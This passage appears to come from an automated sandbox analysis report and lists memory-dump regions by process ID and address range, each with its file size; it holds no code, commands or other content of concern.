                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-3-0x00000000750A0000-0x0000000075850000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-4702-0x00000000750AE000-0x00000000750AF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-2-0x0000000005950000-0x0000000005974000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      144KB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-1-0x0000000000F90000-0x0000000000FEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      376KB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-29-0x00000000180A0000-0x00000000180B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                                                                    • memory/2252-4-0x0000000006060000-0x0000000006604000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                    • memory/2372-4834-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                    • memory/2536-5941-0x00000000061E0000-0x0000000006534000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/2536-5963-0x00000000069D0000-0x0000000006A1C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                    • memory/2676-6988-0x0000000004C80000-0x0000000004FD4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/2676-6989-0x0000000005440000-0x000000000548C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                    • memory/2800-2217-0x00000000008A0000-0x0000000001EC7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      22.2MB

                                                                                                                                                                                                                                                                                                                                    • memory/2800-3622-0x00000000008A0000-0x0000000001EC7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      22.2MB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-32-0x00000000750A0000-0x0000000075850000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-58-0x0000000004E40000-0x0000000004E4A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-46-0x00000000750A0000-0x0000000075850000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-82-0x00000000750A0000-0x0000000075850000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-36-0x0000000004D80000-0x0000000004E12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      584KB

                                                                                                                                                                                                                                                                                                                                    • memory/3200-31-0x0000000000490000-0x00000000004AC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-3623-0x0000000007AF0000-0x0000000007B9A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      680KB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-188-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-128-0x0000000005EB0000-0x0000000006400000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-135-0x00000000069B0000-0x0000000006EFE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-7854-0x0000000000A60000-0x0000000000A6C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-137-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-138-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-160-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-168-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-178-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-180-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-196-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-206-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-3349-0x000000000BCB0000-0x000000000C390000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-203-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-194-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-186-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-142-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-150-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-156-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-158-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-140-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-144-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-146-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-148-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-152-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-154-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-162-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-164-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-166-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-171-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-172-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-176-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-174-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-182-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-184-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-190-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3740-192-0x00000000069B0000-0x0000000006EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/4100-7460-0x0000000000780000-0x0000000000DEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/4100-5585-0x0000000000780000-0x0000000000DEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/4100-6859-0x0000000000780000-0x0000000000DEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/4216-4796-0x0000020E4A480000-0x0000020E4A4DC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      368KB

                                                                                                                                                                                                                                                                                                                                    • memory/4216-4791-0x0000020E31F00000-0x0000020E31F0C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                                                                                                                    • memory/4216-4420-0x0000020E31EB0000-0x0000020E31ED2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                                                                    • memory/4892-3409-0x000000001C670000-0x000000001C722000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      712KB

                                                                                                                                                                                                                                                                                                                                    • memory/4892-3408-0x000000001C560000-0x000000001C5B0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      320KB

                                                                                                                                                                                                                                                                                                                                    • memory/4892-7517-0x000000001CFA0000-0x000000001D4C8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.2MB

                                                                                                                                                                                                                                                                                                                                    • memory/4924-6952-0x0000000004950000-0x0000000004CA4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/4924-6953-0x00000000053A0000-0x00000000053EC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                    • memory/5588-6633-0x0000000140000000-0x0000000140DCF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      13.8MB

                                                                                                                                                                                                                                                                                                                                    • memory/5588-5396-0x0000000140000000-0x0000000140DCF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      13.8MB

                                                                                                                                                                                                                                                                                                                                    • memory/6076-6135-0x0000000000780000-0x0000000000DEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/6076-6941-0x0000000000780000-0x0000000000DEE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/6084-3226-0x0000000000B00000-0x0000000000E24000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3.1MB